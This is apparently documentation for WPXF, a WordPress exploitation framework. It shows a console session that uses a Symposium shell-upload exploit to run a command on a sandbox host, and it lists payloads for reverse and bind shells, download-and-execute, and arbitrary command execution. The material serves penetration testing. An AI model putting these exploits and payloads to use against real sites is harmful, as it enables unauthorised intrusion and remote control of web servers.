bundle install
.gem install bundler
.ruby wpxf.rb
.search
command or load a module using the use
command.set
command and view information about the module using info
.wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
For a full list of supported commands, take a look at This Wiki Page .
What is the difference between auxiliary and exploit modules?
Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
What payloads are available?
- bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
- custom: uploads and executes a custom PHP script.
- download_exec: downloads and runs a remote executable file.
- exec: runs a shell command on the remote server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that will establish a reverse TCP shell.
All these payloads, with the exception of custom
, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.
How can I write my own modules and payloads?
Guides on writing modules and payloads can be found on The Wiki and full documentation of the API can be found athttp://www.getwpxf.com/doc .
Comments